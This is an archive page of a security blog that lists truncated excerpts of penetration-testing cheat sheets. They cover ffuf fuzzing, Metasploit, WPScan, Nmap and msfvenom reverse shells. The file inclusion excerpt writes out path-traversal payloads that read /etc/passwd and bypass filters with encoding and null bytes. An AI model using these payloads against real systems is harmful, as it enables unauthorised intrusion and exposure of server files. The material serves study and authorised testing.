Bharath Narayanasamy – Page 13

Fuff – Cheat Sheet

Views: 42Ffuf commands Command Description ffuf -h ffuf help ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing ffuf -w wordlist.txt:FUZZ -u https://FUZZ.nlabs.local/ Sub-domain Fuzzing ffuf -w wordlist.txt:FUZZ -u http://nlabs.local:PORT/ … Read more

File Inclusion – Cheat Sheet

by Bharath Narayanasamy

Views: 28Local File Inclusion Command Description Basic LFI /index.php?language=/etc/passwd Basic LFI /index.php?language=../../../../etc/passwd LFI with path traversal /index.php?language=/../../../etc/passwd LFI with name prefix /index.php?language=./languages/../../../../etc/passwd LFI with approved path LFI Bypasses /index.php?language=….//….//….//….//etc/passwd Bypass basic path traversal filter /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 Bypass filters with URL encoding /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times] Bypass appended extension with path truncation (obsolete) /index.php?language=../../../../etc/passwd%00 Bypass appended extension … Read more

Web Vulnerabilities – File Inclusion

by Bharath Narayanasamy

Views: 26Path Traversal Also known as Directory traversal, a web security vulnerability allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application’s URL to locate and access files or directories stored outside the application’s root directory. … Read more

Metasploit Cheat Sheet

by Bharath Narayanasamy

crop hacker silhouette typing on computer keyboard while hacking system

This entry is part 3 of 5 in the series Red Team Engagements

Views: 38MSFconsole Commands Command Description show exploits Show all exploits within the Framework. show payloads Show all payloads within the Framework. grep meterpreter show payloadsgrep meterpreter grep reverse_tcp show payloads MSF – Searching for Specific Payload show auxiliary Show all auxiliary modules within the Framework. search <name> Search for exploits or modules within the Framework. … Read more

Enumerating WordPress with WPScan

by Bharath Narayanasamy

Views: 43WPScan capabilities Update the local database of WPScan The local database can be updated with the following command: wpscan –update Enumeration Modes When enumerating the WordPress version, installed plugins or installed themes, you can use three different “modes”, which are: The following enumeration options exist: If no option is supplied to the -e flag, then the … Read more

Nmap

by Bharath Narayanasamy

Views: 26Nmap scan – port states Port State Description Open Indicates that an application on the target system is actively accepting connections (TCP/UDP/SCTP) on that port. Closed Indicates there isn’t any application listening on that port. Filtered Nmap cannot to determine the port status as the nmap probes are not able to reach the port. … Read more

MSFVenom Cheatsheet for Reverse_Shell Payloads

by Bharath Narayanasamy

Views: 340 Non-Meterpreter We can execute the msfvenom –list-payloads command to see a brief description about all of the payloads msfvenom can offer, if we want to know specific information about the payload, executing a msfvenom -p payload –list-options will list all of the options avalible in the payload. Binaries Staged Payloads for Windows x86 … Read more